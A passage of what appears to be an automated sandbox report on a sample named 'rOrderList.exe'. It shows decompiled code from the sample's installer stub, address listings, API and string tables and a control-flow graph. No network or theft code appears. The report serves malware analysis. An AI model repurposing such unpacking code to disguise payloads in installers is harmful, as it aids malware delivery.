                                                                                      				void* _t68;
                                                                                      				intOrPtr* _t70;
                                                                                      				intOrPtr _t71;
                                                                                      				signed int _t77;
                                                                                      				signed int _t82;
                                                                                      				signed int _t83;
                                                                                      				signed int _t89;
                                                                                      				intOrPtr _t92;
                                                                                      				long _t94;
                                                                                      				signed int _t102;
                                                                                      				signed int _t104;
                                                                                      				void* _t106;
                                                                                      				signed int _t107;
                                                                                      				signed int _t110;
                                                                                      				void* _t111;
                                                                                      
                                                                                      				_t94 = 0;
                                                                                      				_v8 = 0;
                                                                                      				_v12 = 0;
                                                                                      				 *0x42a270 = GetTickCount() + 0x3e8;
                                                                                      				GetModuleFileNameW(0, 0x438800, 0x400);
                                                                                      				_t106 = E00406032(0x438800, 0x80000000, 3);
                                                                                      				 *0x40a018 = _t106;
                                                                                      				if(_t106 == 0xffffffff) {
                                                                                      					return L"Error launching installer";
                                                                                      				}
                                                                                      				E0040653C(L"C:\\Users\\Arthur\\Desktop", 0x438800);
                                                                                      				E0040653C(0x439000, E00405E5D(L"C:\\Users\\Arthur\\Desktop"));
                                                                                      				_t54 = GetFileSize(_t106, 0);
                                                                                      				__eflags = _t54;
                                                                                      				 *0x420f00 = _t54;
                                                                                      				_t110 = _t54;
                                                                                      				if(_t54 <= 0) {
                                                                                      					L24:
                                                                                      					E00402FC6(1);
                                                                                      					__eflags =  *0x42a278 - _t94;
                                                                                      					if( *0x42a278 == _t94) {
                                                                                      						goto L32;
                                                                                      					}
                                                                                      					__eflags = _v12 - _t94;
                                                                                      					if(_v12 == _t94) {
                                                                                      						L28:
                                                                                      						_t57 = GlobalAlloc(0x40, _v20); // executed
                                                                                      						_t111 = _t57;
                                                                                      						E00406A8C(0x40ce68);
                                                                                      						E00406061(0x40ce68,  &_v560, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\"); // executed
                                                                                      						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
                                                                                      						__eflags = _t62 - 0xffffffff;
                                                                                      						 *0x40a01c = _t62;
                                                                                      						if(_t62 != 0xffffffff) {
                                                                                      							_t65 = E00403590( *0x42a278 + 0x1c);
                                                                                      							 *0x420f04 = _t65;
                                                                                      							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                                                                                      							_t68 = E00403309(_v16, 0xffffffff, _t94, _t111, _v20); // executed
                                                                                      							__eflags = _t68 - _v20;
                                                                                      							if(_t68 == _v20) {
                                                                                      								__eflags = _v40 & 0x00000001;
                                                                                      								 *0x42a274 = _t111;
                                                                                      								 *0x42a27c =  *_t111;
                                                                                      								if((_v40 & 0x00000001) != 0) {
                                                                                      									 *0x42a280 =  *0x42a280 + 1;
                                                                                      									__eflags =  *0x42a280;
                                                                                      								}
                                                                                      								_t45 = _t111 + 0x44; // 0x44
                                                                                      								_t70 = _t45;
                                                                                      								_t102 = 8;
                                                                                      								do {
                                                                                      									_t70 = _t70 - 8;
                                                                                      									 *_t70 =  *_t70 + _t111;
                                                                                      									_t102 = _t102 - 1;
                                                                                      									__eflags = _t102;
                                                                                      								} while (_t102 != 0);
                                                                                      								_t71 =  *0x420ef4; // 0x4aa26
                                                                                      								 *((intOrPtr*)(_t111 + 0x3c)) = _t71;
                                                                                      								E00405FED(0x42a2a0, _t111 + 4, 0x40);
                                                                                      								__eflags = 0;
                                                                                      								return 0;
                                                                                      							}
                                                                                      							goto L32;
                                                                                      						}
                                                                                      						return L"Error writing temporary file. Make sure your temp folder is valid.";
                                                                                      					}
                                                                                      					E00403590( *0x420ef0);
                                                                                      					_t77 = E0040357A( &_a4, 4);
                                                                                      					__eflags = _t77;
                                                                                      					if(_t77 == 0) {
                                                                                      						goto L32;
                                                                                      					}
                                                                                      					__eflags = _v8 - _a4;
                                                                                      					if(_v8 != _a4) {
                                                                                      						goto L32;
                                                                                      					}
                                                                                      					goto L28;
                                                                                      				} else {
                                                                                      					do {
                                                                                      						_t107 = _t110;
                                                                                      						asm("sbb eax, eax");
                                                                                      						_t82 = ( ~( *0x42a278) & 0x00007e00) + 0x200;
                                                                                      						__eflags = _t110 - _t82;
                                                                                      						if(_t110 >= _t82) {
                                                                                      							_t107 = _t82;
                                                                                      						}
                                                                                      						_t83 = E0040357A(0x418ef0, _t107);
                                                                                      						__eflags = _t83;
                                                                                      						if(_t83 == 0) {
                                                                                      							E00402FC6(1);
                                                                                      							L32:
                                                                                      							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                                      						}
                                                                                      						__eflags =  *0x42a278;
                                                                                      						if( *0x42a278 != 0) {
                                                                                      							__eflags = _a4 & 0x00000002;
                                                                                      							if((_a4 & 0x00000002) == 0) {
                                                                                      								E00402FC6(0);
                                                                                      							}
                                                                                      							goto L20;
                                                                                      						}
                                                                                      						E00405FED( &_v40, 0x418ef0, 0x1c);
                                                                                      						_t89 = _v40;
                                                                                      						__eflags = _t89 & 0xfffffff0;
                                                                                      						if((_t89 & 0xfffffff0) != 0) {
                                                                                      							goto L20;
                                                                                      						}
                                                                                      						__eflags = _v36 - 0xdeadbeef;
                                                                                      						if(_v36 != 0xdeadbeef) {
                                                                                      							goto L20;
                                                                                      						}
                                                                                      						__eflags = _v24 - 0x74736e49;
                                                                                      						if(_v24 != 0x74736e49) {
                                                                                      							goto L20;
                                                                                      						}
                                                                                      						__eflags = _v28 - 0x74666f73;
                                                                                      						if(_v28 != 0x74666f73) {
                                                                                      							goto L20;
                                                                                      						}
                                                                                      						__eflags = _v32 - 0x6c6c754e;
                                                                                      						if(_v32 != 0x6c6c754e) {
                                                                                      							goto L20;
                                                                                      						}
                                                                                      						_a4 = _a4 | _t89;
                                                                                      						_t104 =  *0x420ef0; // 0x0
                                                                                      						 *0x42a320 =  *0x42a320 | _a4 & 0x00000002;
                                                                                      						_t92 = _v16;
                                                                                      						__eflags = _t92 - _t110;
                                                                                      						 *0x42a278 = _t104;
                                                                                      						if(_t92 > _t110) {
                                                                                      							goto L32;
                                                                                      						}
                                                                                      						__eflags = _a4 & 0x00000008;
                                                                                      						if((_a4 & 0x00000008) != 0) {
                                                                                      							L16:
                                                                                      							_v12 = _v12 + 1;
                                                                                      							_t110 = _t92 - 4;
                                                                                      							__eflags = _t107 - _t110;
                                                                                      							if(_t107 > _t110) {
                                                                                      								_t107 = _t110;
                                                                                      							}
                                                                                      							goto L20;
                                                                                      						}
                                                                                      						__eflags = _a4 & 0x00000004;
                                                                                      						if((_a4 & 0x00000004) != 0) {
                                                                                      							break;
                                                                                      						}
                                                                                      						goto L16;
                                                                                      						L20:
                                                                                      						__eflags = _t110 -  *0x420f00; // 0x58e
                                                                                      						if(__eflags < 0) {
                                                                                      							_v8 = E00406A1E(_v8, 0x418ef0, _t107);
                                                                                      						}
                                                                                      						 *0x420ef0 =  *0x420ef0 + _t107;
                                                                                      						_t110 = _t110 - _t107;
                                                                                      						__eflags = _t110;
                                                                                      					} while (_t110 != 0);
                                                                                      					_t94 = 0;
                                                                                      					__eflags = 0;
                                                                                      					goto L24;
                                                                                      				}
                                                                                      			}
































                                                                                      0x00403073
                                                                                      0x00403076
                                                                                      0x00403079
                                                                                      0x00403093
                                                                                      0x00403098
                                                                                      0x004030ab
                                                                                      0x004030b0
                                                                                      0x004030b6
                                                                                      0x00000000
                                                                                      0x004030b8
                                                                                      0x004030c9
                                                                                      0x004030da
                                                                                      0x004030e1
                                                                                      0x004030e7
                                                                                      0x004030e9
                                                                                      0x004030ee
                                                                                      0x004030f0
                                                                                      0x004031db
                                                                                      0x004031dd
                                                                                      0x004031e2
                                                                                      0x004031e9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004031ef
                                                                                      0x004031f2
                                                                                      0x0040321e
                                                                                      0x00403223
                                                                                      0x0040322e
                                                                                      0x00403230
                                                                                      0x00403241
                                                                                      0x0040325c
                                                                                      0x00403262
                                                                                      0x00403265
                                                                                      0x0040326a
                                                                                      0x00403289
                                                                                      0x00403299
                                                                                      0x004032ab
                                                                                      0x004032b0
                                                                                      0x004032b5
                                                                                      0x004032b8
                                                                                      0x004032c1
                                                                                      0x004032c5
                                                                                      0x004032cd
                                                                                      0x004032d2
                                                                                      0x004032d4
                                                                                      0x004032d4
                                                                                      0x004032d4
                                                                                      0x004032dc
                                                                                      0x004032dc
                                                                                      0x004032df
                                                                                      0x004032e0
                                                                                      0x004032e0
                                                                                      0x004032e3
                                                                                      0x004032e5
                                                                                      0x004032e5
                                                                                      0x004032e5
                                                                                      0x004032e8
                                                                                      0x004032ef
                                                                                      0x004032fb
                                                                                      0x00403300
                                                                                      0x00000000
                                                                                      0x00403300
                                                                                      0x00000000
                                                                                      0x004032b8
                                                                                      0x00000000
                                                                                      0x0040326c
                                                                                      0x004031fa
                                                                                      0x00403205
                                                                                      0x0040320a
                                                                                      0x0040320c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403215
                                                                                      0x00403218
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004030f6
                                                                                      0x004030fb
                                                                                      0x00403100
                                                                                      0x00403104
                                                                                      0x0040310b
                                                                                      0x00403110
                                                                                      0x00403112
                                                                                      0x00403114
                                                                                      0x00403114
                                                                                      0x00403118
                                                                                      0x0040311d
                                                                                      0x0040311f
                                                                                      0x00403278
                                                                                      0x004032ba
                                                                                      0x00000000
                                                                                      0x004032ba
                                                                                      0x00403125
                                                                                      0x0040312c
                                                                                      0x004031a8
                                                                                      0x004031ac
                                                                                      0x004031b0
                                                                                      0x004031b5
                                                                                      0x00000000
                                                                                      0x004031ac
                                                                                      0x00403135
                                                                                      0x0040313a
                                                                                      0x0040313d
                                                                                      0x00403142
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403144
                                                                                      0x0040314b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040314d
                                                                                      0x00403154
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403156
                                                                                      0x0040315d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040315f
                                                                                      0x00403166
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403168
                                                                                      0x0040316e
                                                                                      0x00403177
                                                                                      0x0040317d
                                                                                      0x00403180
                                                                                      0x00403182
                                                                                      0x00403188
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040318e
                                                                                      0x00403192
                                                                                      0x0040319a
                                                                                      0x0040319a
                                                                                      0x0040319d
                                                                                      0x004031a0
                                                                                      0x004031a2
                                                                                      0x004031a4
                                                                                      0x004031a4
                                                                                      0x00000000
                                                                                      0x004031a2
                                                                                      0x00403194
                                                                                      0x00403198
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004031b6
                                                                                      0x004031b6
                                                                                      0x004031bc
                                                                                      0x004031c8
                                                                                      0x004031c8
                                                                                      0x004031cb
                                                                                      0x004031d1
                                                                                      0x004031d1
                                                                                      0x004031d1
                                                                                      0x004031d9
                                                                                      0x004031d9
                                                                                      0x00000000
                                                                                      0x004031d9

                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 0040307C
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00403098
                                                                                        • Part of subcall function 00406032: GetFileAttributesW.KERNELBASE(00000003,004030AB,00438800,80000000,00000003), ref: 00406036
                                                                                        • Part of subcall function 00406032: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003), ref: 004030E1
                                                                                      • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 00403223
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403072, 0040323B
                                                                                      • Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040326C
                                                                                      • Null, xrefs: 0040315F
                                                                                      • Error launching installer, xrefs: 004030B8
                                                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004032BA
                                                                                      • "C:\Users\user\Desktop\rOrderList.exe", xrefs: 00403068
                                                                                      • soft, xrefs: 00403156
                                                                                      • Inst, xrefs: 0040314D
                                                                                      • C:\Users\user\Desktop, xrefs: 004030C3, 004030C8, 004030CE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                      • String ID: "C:\Users\user\Desktop\rOrderList.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                      • API String ID: 2803837635-1096311453
                                                                                      • Opcode ID: 8e4e929ec00d298773cd7711401fbd042d30ada64bab94f08e83dcc7a4259e6b
                                                                                      • Instruction ID: 3c019e557a6e0d840000321a6ffc1a5a74fe8930866e2d2a4a5af375f72a0401
                                                                                      • Opcode Fuzzy Hash: 8e4e929ec00d298773cd7711401fbd042d30ada64bab94f08e83dcc7a4259e6b
                                                                                      • Instruction Fuzzy Hash: 9B71E431A00204ABDB20DF64DD85B5E3EBCAB18315F2045BBF901B72D2D7789E458B6D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 439 406579-406584 440 406586-406595 439->440 441 406597-4065ad 439->441 440->441 442 4065b3-4065c0 441->442 443 4067c5-4067cb 441->443 442->443 444 4065c6-4065cd 442->444 445 4067d1-4067dc 443->445 446 4065d2-4065df 443->446 444->443 448 4067e7-4067e8 445->448 449 4067de-4067e2 call 40653c 445->449 446->445 447 4065e5-4065f1 446->447 450 4067b2 447->450 451 4065f7-406635 447->451 449->448 455 4067c0-4067c3 450->455 456 4067b4-4067be 450->456 453 406755-406759 451->453 454 40663b-406646 451->454 459 40675b-406761 453->459 460 40678c-406790 453->460 457 406648-40664d 454->457 458 40665f 454->458 455->443 456->443 457->458 463 40664f-406652 457->463 466 406666-40666d 458->466 464 406771-40677d call 40653c 459->464 465 406763-40676f call 406483 459->465 461 406792-40679a call 406579 460->461 462 40679f-4067b0 lstrlenW 460->462 461->462 462->443 463->458 469 406654-406657 463->469 475 406782-406788 464->475 465->475 471 406672-406674 466->471 472 40666f-406671 466->472 469->458 476 406659-40665d 469->476 473 406676-406694 call 40640a 471->473 474 4066af-4066b2 471->474 472->471 482 406699-40669d 473->482 480 4066c2-4066c5 474->480 481 4066b4-4066c0 GetSystemDirectoryW 474->481 475->462 479 40678a 475->479 476->466 483 40674d-406753 call 4067eb 479->483 485 406730-406732 480->485 486 4066c7-4066d5 GetWindowsDirectoryW 480->486 484 406734-406738 481->484 487 4066a3-4066aa call 406579 482->487 488 40673d-406740 482->488 483->462 484->483 490 40673a 484->490 485->484 489 4066d7-4066e1 485->489 486->485 487->484 488->483 493 406742-406748 lstrcatW 488->493 495 4066e3-4066e6 489->495 496 4066fb-406711 SHGetSpecialFolderLocation 489->496 490->488 493->483 495->496 500 4066e8-4066ef 495->500 497 406713-40672a SHGetPathFromIDListW CoTaskMemFree 496->497 498 40672c 496->498 497->484 497->498 498->485 501 4066f7-4066f9 500->501 501->484 501->496
                                                                                      C-Code - Quality: 72%
                                                                                      			E00406579(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                                                      				signed int _v8;
                                                                                      				struct _ITEMIDLIST* _v12;
                                                                                      				signed int _v16;
                                                                                      				signed int _v20;
                                                                                      				signed int _v24;
                                                                                      				signed int _v28;
                                                                                      				signed int _t43;
                                                                                      				WCHAR* _t44;
                                                                                      				signed char _t46;
                                                                                      				signed int _t47;
                                                                                      				signed int _t48;
                                                                                      				short _t58;
                                                                                      				short _t60;
                                                                                      				short _t62;
                                                                                      				void* _t70;
                                                                                      				signed int _t76;
                                                                                      				void* _t82;
                                                                                      				signed char _t83;
                                                                                      				short _t86;
                                                                                      				signed int _t96;
                                                                                      				void* _t102;
                                                                                      				short _t103;
                                                                                      				signed int _t106;
                                                                                      				signed int _t108;
                                                                                      				void* _t109;
                                                                                      				WCHAR* _t110;
                                                                                      				void* _t112;
                                                                                      
                                                                                      				_t109 = __esi;
                                                                                      				_t102 = __edi;
                                                                                      				_t70 = __ebx;
                                                                                      				_t43 = _a8;
                                                                                      				if(_t43 < 0) {
                                                                                      					_t43 =  *( *0x42923c - 4 + _t43 * 4);
                                                                                      				}
                                                                                      				_push(_t70);
                                                                                      				_push(_t109);
                                                                                      				_push(_t102);
                                                                                      				_t96 =  *0x42a2b8 + _t43 * 2;
                                                                                      				_t44 = 0x428200;
                                                                                      				_t110 = 0x428200;
                                                                                      				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
                                                                                      					_t110 = _a4;
                                                                                      					_a4 = _a4 & 0x00000000;
                                                                                      				}
                                                                                      				while(1) {
                                                                                      					_t103 =  *_t96;
                                                                                      					if(_t103 == 0) {
                                                                                      						break;
                                                                                      					}
                                                                                      					__eflags = (_t110 - _t44 & 0xfffffffe) - 0x800;
                                                                                      					if((_t110 - _t44 & 0xfffffffe) >= 0x800) {
                                                                                      						break;
                                                                                      					}
                                                                                      					_t82 = 2;
                                                                                      					_t96 = _t96 + _t82;
                                                                                      					__eflags = _t103 - 4;
                                                                                      					_a8 = _t96;
                                                                                      					if(__eflags >= 0) {
                                                                                      						if(__eflags != 0) {
                                                                                      							 *_t110 = _t103;
                                                                                      							_t110 = _t110 + _t82;
                                                                                      							__eflags = _t110;
                                                                                      						} else {
                                                                                      							 *_t110 =  *_t96;
                                                                                      							_t110 = _t110 + _t82;
                                                                                      							_t96 = _t96 + _t82;
                                                                                      						}
                                                                                      						continue;
                                                                                      					}
                                                                                      					_t83 =  *((intOrPtr*)(_t96 + 1));
                                                                                      					_t46 =  *_t96;
                                                                                      					_t47 = _t46 & 0x000000ff;
                                                                                      					_v8 = (_t83 & 0x0000007f) << 0x00000007 | _t46 & 0x0000007f;
                                                                                      					_a8 = _a8 + 2;
                                                                                      					_v28 = _t47 | 0x00008000;
                                                                                      					_v24 = _t47;
                                                                                      					_t76 = _t83 & 0x000000ff;
                                                                                      					_v16 = _t76;
                                                                                      					__eflags = _t103 - 2;
                                                                                      					_v20 = _t76 | 0x00008000;
                                                                                      					if(_t103 != 2) {
                                                                                      						__eflags = _t103 - 3;
                                                                                      						if(_t103 != 3) {
                                                                                      							__eflags = _t103 - 1;
                                                                                      							if(_t103 == 1) {
                                                                                      								__eflags = (_t47 | 0xffffffff) - _v8;
                                                                                      								E00406579(_t76, _t103, _t110, _t110, (_t47 | 0xffffffff) - _v8);
                                                                                      							}
                                                                                      							L43:
                                                                                      							_t48 = lstrlenW(_t110);
                                                                                      							_t96 = _a8;
                                                                                      							_t110 =  &(_t110[_t48]);
                                                                                      							_t44 = 0x428200;
                                                                                      							continue;
                                                                                      						}
                                                                                      						_t106 = _v8;
                                                                                      						__eflags = _t106 - 0x1d;
                                                                                      						if(_t106 != 0x1d) {
                                                                                      							__eflags = (_t106 << 0xb) + 0x42b000;
                                                                                      							E0040653C(_t110, (_t106 << 0xb) + 0x42b000);
                                                                                      						} else {
                                                                                      							E00406483(_t110,  *0x42a268);
                                                                                      						}
                                                                                      						__eflags = _t106 + 0xffffffeb - 7;
                                                                                      						if(_t106 + 0xffffffeb < 7) {
                                                                                      							L34:
                                                                                      							E004067EB(_t110);
                                                                                      						}
                                                                                      						goto L43;
                                                                                      					}
                                                                                      					_t86 =  *0x42a26c;
                                                                                      					__eflags = _t86;
                                                                                      					_t108 = 2;
                                                                                      					if(_t86 >= 0) {
                                                                                      						L13:
                                                                                      						_v8 = 1;
                                                                                      						L14:
                                                                                      						__eflags =  *0x42a304;
                                                                                      						if( *0x42a304 != 0) {
                                                                                      							_t108 = 4;
                                                                                      						}
                                                                                      						__eflags = _t47;
                                                                                      						if(__eflags >= 0) {
                                                                                      							__eflags = _t47 - 0x25;
                                                                                      							if(_t47 != 0x25) {
                                                                                      								__eflags = _t47 - 0x24;
                                                                                      								if(_t47 == 0x24) {
                                                                                      									GetWindowsDirectoryW(_t110, 0x400);
                                                                                      									_t108 = 0;
                                                                                      								}
                                                                                      								while(1) {
                                                                                      									__eflags = _t108;
                                                                                      									if(_t108 == 0) {
                                                                                      										goto L30;
                                                                                      									}
                                                                                      									_t58 =  *0x42a264;
                                                                                      									_t108 = _t108 - 1;
                                                                                      									__eflags = _t58;
                                                                                      									if(_t58 == 0) {
                                                                                      										L26:
                                                                                      										_t60 = SHGetSpecialFolderLocation( *0x42a268,  *(_t112 + _t108 * 4 - 0x18),  &_v12);
                                                                                      										__eflags = _t60;
                                                                                      										if(_t60 != 0) {
                                                                                      											L28:
                                                                                      											 *_t110 =  *_t110 & 0x00000000;
                                                                                      											__eflags =  *_t110;
                                                                                      											continue;
                                                                                      										}
                                                                                      										__imp__SHGetPathFromIDListW(_v12, _t110);
                                                                                      										__imp__CoTaskMemFree(_v12);
                                                                                      										__eflags = _t60;
                                                                                      										if(_t60 != 0) {
                                                                                      											goto L30;
                                                                                      										}
                                                                                      										goto L28;
                                                                                      									}
                                                                                      									__eflags = _v8;
                                                                                      									if(_v8 == 0) {
                                                                                      										goto L26;
                                                                                      									}
                                                                                      									_t62 =  *_t58( *0x42a268,  *(_t112 + _t108 * 4 - 0x18), 0, 0, _t110); // executed
                                                                                      									__eflags = _t62;
                                                                                      									if(_t62 == 0) {
                                                                                      										goto L30;
                                                                                      									}
                                                                                      									goto L26;
                                                                                      								}
                                                                                      								goto L30;
                                                                                      							}
                                                                                      							GetSystemDirectoryW(_t110, 0x400);
                                                                                      							goto L30;
                                                                                      						} else {
                                                                                      							E0040640A( *0x42a2b8, __eflags, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a2b8 + (_t47 & 0x0000003f) * 2, _t110, _t47 & 0x00000040); // executed
                                                                                      							__eflags =  *_t110;
                                                                                      							if( *_t110 != 0) {
                                                                                      								L32:
                                                                                      								__eflags = _t76 - 0x1a;
                                                                                      								if(_t76 == 0x1a) {
                                                                                      									lstrcatW(_t110, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                                      								}
                                                                                      								goto L34;
                                                                                      							}
                                                                                      							E00406579(_t76, _t108, _t110, _t110, _t76);
                                                                                      							L30:
                                                                                      							__eflags =  *_t110;
                                                                                      							if( *_t110 == 0) {
                                                                                      								goto L34;
                                                                                      							}
                                                                                      							_t76 = _v16;
                                                                                      							goto L32;
                                                                                      						}
                                                                                      					}
                                                                                      					__eflags = _t86 - 0x5a04;
                                                                                      					if(_t86 == 0x5a04) {
                                                                                      						goto L13;
                                                                                      					}
                                                                                      					__eflags = _t76 - 0x23;
                                                                                      					if(_t76 == 0x23) {
                                                                                      						goto L13;
                                                                                      					}
                                                                                      					__eflags = _t76 - 0x2e;
                                                                                      					if(_t76 == 0x2e) {
                                                                                      						goto L13;
                                                                                      					} else {
                                                                                      						_v8 = _v8 & 0x00000000;
                                                                                      						goto L14;
                                                                                      					}
                                                                                      				}
                                                                                      				 *_t110 =  *_t110 & 0x00000000;
                                                                                      				if(_a4 == 0) {
                                                                                      					return _t44;
                                                                                      				}
                                                                                      				return E0040653C(_a4, _t44);
                                                                                      			}






























                                                                                      0x00406579
                                                                                      0x00406579
                                                                                      0x00406579
                                                                                      0x0040657f
                                                                                      0x00406584
                                                                                      0x00406595
                                                                                      0x00406595
                                                                                      0x0040659d
                                                                                      0x0040659e
                                                                                      0x0040659f
                                                                                      0x004065a0
                                                                                      0x004065a3
                                                                                      0x004065ab
                                                                                      0x004065ad
                                                                                      0x004065c6
                                                                                      0x004065c9
                                                                                      0x004065c9
                                                                                      0x004067c5
                                                                                      0x004067c5
                                                                                      0x004067cb
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004065d9
                                                                                      0x004065df
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004065e7
                                                                                      0x004065e8
                                                                                      0x004065ea
                                                                                      0x004065ee
                                                                                      0x004065f1
                                                                                      0x004067b2
                                                                                      0x004067c0
                                                                                      0x004067c3
                                                                                      0x004067c3
                                                                                      0x004067b4
                                                                                      0x004067b7
                                                                                      0x004067ba
                                                                                      0x004067bc
                                                                                      0x004067bc
                                                                                      0x00000000
                                                                                      0x004067b2
                                                                                      0x004065f7
                                                                                      0x004065fa
                                                                                      0x00406609
                                                                                      0x00406610
                                                                                      0x0040661a
                                                                                      0x0040661e
                                                                                      0x00406621
                                                                                      0x00406624
                                                                                      0x00406629
                                                                                      0x0040662e
                                                                                      0x00406632
                                                                                      0x00406635
                                                                                      0x00406755
                                                                                      0x00406759
                                                                                      0x0040678c
                                                                                      0x00406790
                                                                                      0x00406795
                                                                                      0x0040679a
                                                                                      0x0040679a
                                                                                      0x0040679f
                                                                                      0x004067a0
                                                                                      0x004067a5
                                                                                      0x004067a8
                                                                                      0x004067ab
                                                                                      0x00000000
                                                                                      0x004067ab
                                                                                      0x0040675b
                                                                                      0x0040675e
                                                                                      0x00406761
                                                                                      0x00406776
                                                                                      0x0040677d
                                                                                      0x00406763
                                                                                      0x0040676a
                                                                                      0x0040676a
                                                                                      0x00406785
                                                                                      0x00406788
                                                                                      0x0040674d
                                                                                      0x0040674e
                                                                                      0x0040674e
                                                                                      0x00000000
                                                                                      0x00406788
                                                                                      0x0040663b
                                                                                      0x00406643
                                                                                      0x00406645
                                                                                      0x00406646
                                                                                      0x0040665f
                                                                                      0x0040665f
                                                                                      0x00406666
                                                                                      0x00406666
                                                                                      0x0040666d
                                                                                      0x00406671
                                                                                      0x00406671
                                                                                      0x00406672
                                                                                      0x00406674
                                                                                      0x004066af
                                                                                      0x004066b2
                                                                                      0x004066c2
                                                                                      0x004066c5
                                                                                      0x004066cd
                                                                                      0x004066d3
                                                                                      0x004066d3
                                                                                      0x00406730
                                                                                      0x00406730
                                                                                      0x00406732
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004066d7
                                                                                      0x004066de
                                                                                      0x004066df
                                                                                      0x004066e1
                                                                                      0x004066fb
                                                                                      0x00406709
                                                                                      0x0040670f
                                                                                      0x00406711
                                                                                      0x0040672c
                                                                                      0x0040672c
                                                                                      0x0040672c
                                                                                      0x00000000
                                                                                      0x0040672c
                                                                                      0x00406717
                                                                                      0x00406722
                                                                                      0x00406728
                                                                                      0x0040672a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040672a
                                                                                      0x004066e3
                                                                                      0x004066e6
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004066f5
                                                                                      0x004066f7
                                                                                      0x004066f9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004066f9
                                                                                      0x00000000
                                                                                      0x00406730
                                                                                      0x004066ba
                                                                                      0x00000000
                                                                                      0x00406676
                                                                                      0x00406694
                                                                                      0x00406699
                                                                                      0x0040669d
                                                                                      0x0040673d
                                                                                      0x0040673d
                                                                                      0x00406740
                                                                                      0x00406748
                                                                                      0x00406748
                                                                                      0x00000000
                                                                                      0x00406740
                                                                                      0x004066a5
                                                                                      0x00406734
                                                                                      0x00406734
                                                                                      0x00406738
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040673a
                                                                                      0x00000000
                                                                                      0x0040673a
                                                                                      0x00406674
                                                                                      0x00406648
                                                                                      0x0040664d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040664f
                                                                                      0x00406652
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406654
                                                                                      0x00406657
                                                                                      0x00000000
                                                                                      0x00406659
                                                                                      0x00406659
                                                                                      0x00000000
                                                                                      0x00406659
                                                                                      0x00406657
                                                                                      0x004067d1
                                                                                      0x004067dc
                                                                                      0x004067e8
